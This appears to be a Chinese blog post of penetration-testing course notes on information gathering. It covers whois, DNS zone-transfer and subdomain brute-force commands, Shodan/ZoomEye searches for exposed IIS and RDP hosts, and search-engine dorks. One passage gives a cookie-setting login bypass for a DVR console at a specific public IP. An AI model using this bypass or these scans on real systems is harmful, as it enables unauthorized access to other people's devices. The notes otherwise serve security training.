• Day41信息收集


    练手网站:testfire.net
    vulnweb.com
    whois查询:
    kali:
    ping www.baidu.com
    whois工具
    whois testfire.net
    whois domain
    whois testfire.net
    whois testphp.vulnweb.com //查不出来
    whois vulnhub.com //能查出来
    站长之家:http://whois.chinaz.com
    邮箱反查
    子域名查询:
    https://searchdns.netcraft.com
    火狐:
    1)netcraf.com
    2)证书
    域传送漏洞:vulnhub.com
    dig工具:
    dig axfr @dnsexample.com example.com
    dig axfr @172.16.132.1 vulhub.org
    通过域传送漏洞
    子域名信息
    子域名要对应的IP地址
    子域名挖掘机layer------新建dic.txt
    dic.txt:
    news
    mail
    www
    map
    aaa
    bbb
    ccc
    vulnhub.com启动
    baidu.com
    dnsrecon 子域名枚举(爆破)
    cd tmp/
    ls
    mkdir 1901
    cd 1901/
    dnsrecon
    mkdir dic
    cd dic/
    ls
    vim dns.dic
    dns.dic:
    mail
    news
    aaa
    bbb
    www
    map
    dnsrecon -d baidu.com -D /root/tmp/1901/dic/dns.dic -t brt
    dnsrecon -d vulnweb.com -D /root/tmp/1901/dic/dns.dic -t brt
    -d:域名
    -D:字典
    -t:模式
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述在这里插入图片描述

    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述DNS2IP
    1)ping testfire.net
    ping是非权威应答
    可得IP65.61.137.117
    ping baidu.com //39.1
    2)nslookup 非权威应答
    testfire.net 65.61.137.117
    baidu.com
    3)dig
    dig testfire.net
    dig +trace testfire.net //获取详细解析过程
    dig @8.8.8.8 testfire.net
    dig @8.8.8.8 www.baidu.com

    dnsenum
    mkdir dnsenum
    cd dnsenum1
    dnsenum testfire.net
    站长之家-------站长工具----------DNS查询
    路由追踪
    搜索tools,看文章
    IP查询:
    通IP网站查询:同一个IP上的网站
    1.1.1.1
    A B
    旁站
    1.1.1.* C段查询
    65.61.137.117
    查IP经纬度:
    https://www.maxmind.com/zh/home
    通过GPS查询物理位置
    http://www.gpsspg.com/maps.htm
    site指定一个网站
    “”
    百度:“parent directory” site:testfire.net
    Bing国际版
    Index of/gallery/Movies
    inurl 在url中出现的关键字
    filetype 指定文件类型 不太好用
    filetype pdf
    钟馗之眼 公网设备
    https://www.zoomeye.org/
    不好用,不准
    搜索iis6.0组件:
    app:“Microsoft IIS httpd” ver:“6.0”
    搜索开启3389端口的主机
    port:3389 OS:windows
    shodan
    https://www.shodan.io
    port:3389 OS:windows //error
    3389
    新建标签页打开
    搜索:JAWA/1.1 新建标签页打开,复制地址无法登录
    admin

    登录绕过:
    http://86.99.112.102:9000/view.html
    在控制台输入以下JS代码然后直接访问
    /view.html]即可绕过登录进入控制台
    document.cookie=“dvr_camcnt=4”;
    document.cookie=“dvr_usr=admin”;
    document.cookie=“dvr_pwd=123”;
    搜索Hikvision
    网站信息收集:
    收集指纹信息
    web服务器信息
    netcraft网站插件
    火狐组件netcraft插件
    Extension安装
    site report
    wapper插件
    wappalyzer
    oa.1000phone.net

    在这里插入图片描述

  • 相关阅读:
    万变不离其宗:利用VSCode进行花式编译与调试
    Kafak - 单机/集群快速安装指北(3.x版本)
    线性代数_第二章,矩阵
    SpringBoot二手车管理系统
    十年 Java API 版权案终落地、Log4j 漏洞蛰伏八年后席卷全球,2021 年开源圈大事件盘点
    给牛奶做直播之二
    ES6新特性:变量的解构赋值
    质量平台-sonarlint-idea本地配置及使用技巧
    vant-基于van-uploader封装的文件上传图片压缩组件
    用视频设置为视频的背景剪辑的两种效果
  • 原文地址:https://blog.csdn.net/qq_45169358/article/details/127958607